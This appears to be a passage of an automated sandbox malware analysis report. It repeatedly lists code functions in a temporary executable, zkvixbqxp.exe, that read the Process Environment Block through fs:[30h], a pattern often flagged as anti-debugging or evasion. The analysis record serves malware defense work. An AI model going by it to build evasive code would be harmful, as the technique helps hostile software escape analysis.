Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AB49A4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AB49A4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h] 3_2_00A751BE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h] 3_2_00A751BE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h] 3_2_00A751BE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h] 3_2_00A751BE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h] 3_2_00A1C182
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h] 3_2_00A2A185
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h] 3_2_00A22990
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h] 3_2_00A841E8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009FB1E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009FB1E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009FB1E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h] 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h] 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h] 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h] 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h] 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h] 3_2_00A2513A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h] 3_2_00A2513A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h] 3_2_009F9100
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h] 3_2_009F9100
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h] 3_2_009F9100
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h] 3_2_00A1B944
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h] 3_2_00A1B944
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h] 3_2_009FB171
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h] 3_2_009FB171
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h] 3_2_009FC962
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A0AAB0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A0AAB0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A2FAB0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h] 3_2_00A2D294
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h] 3_2_00A2D294
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h] 3_2_009F52A5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h] 3_2_009F52A5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h] 3_2_009F52A5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h] 3_2_009F52A5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h] 3_2_009F52A5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A22AE4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h] 3_2_00A22ACB
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h] 3_2_009FAA16
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h] 3_2_009FAA16
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h] 3_2_00A34A2C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h] 3_2_00A34A2C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h] 3_2_009F5210
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h] 3_2_009F5210
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h] 3_2_009F5210
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h] 3_2_009F5210
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h] 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h] 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h] 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h] 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h] 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h] 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h] 3_2_00A08A0A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h] 3_2_00A13A1C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ABAA16
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ABAA16
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h] 3_2_00AAB260
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h] 3_2_00AAB260
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h] 3_2_00AC8A62
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h] 3_2_00A3927A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h] 3_2_009F9240
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h] 3_2_009F9240
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h] 3_2_009F9240
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h] 3_2_009F9240
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h] 3_2_00ABEA55
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h] 3_2_00A84257
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00AC5BA5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h] 3_2_00A24BAD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h] 3_2_00A24BAD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h] 3_2_00A24BAD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h] 3_2_00AB138A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h] 3_2_00A2138B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h] 3_2_00A2138B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h] 3_2_00A2138B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h] 3_2_00AAD380
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h] 3_2_00A01B8F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h] 3_2_00A01B8F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h] 3_2_00A2B390
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h] 3_2_00A22397
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h] 3_2_00A203E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h] 3_2_00A203E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h] 3_2_00A203E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h] 3_2_00A203E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h] 3_2_00A203E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h] 3_2_00A203E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A1DBE9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h] 3_2_00AA23E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h] 3_2_00AA23E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA23E3 mov eax, dword ptr fs:[00000030h] 3_2_00AA23E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h] 3_2_00A753CA
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h] 3_2_00A753CA
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h] 3_2_00AB131B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h] 3_2_009FF358
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h] 3_2_00A23B7A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h] 3_2_00A23B7A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FDB40 mov eax, dword ptr fs:[00000030h] 3_2_009FDB40
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8B58 mov eax, dword ptr fs:[00000030h] 3_2_00AC8B58
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FDB60 mov ecx, dword ptr fs:[00000030h] 3_2_009FDB60
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0849B mov eax, dword ptr fs:[00000030h] 3_2_00A0849B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB14FB mov eax, dword ptr fs:[00000030h] 3_2_00AB14FB
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A76CF0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A76CF0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A76CF0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00AC8CD6
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A2BC2C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h] 3_2_00AC740D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h] 3_2_00AC740D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h] 3_2_00AC740D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
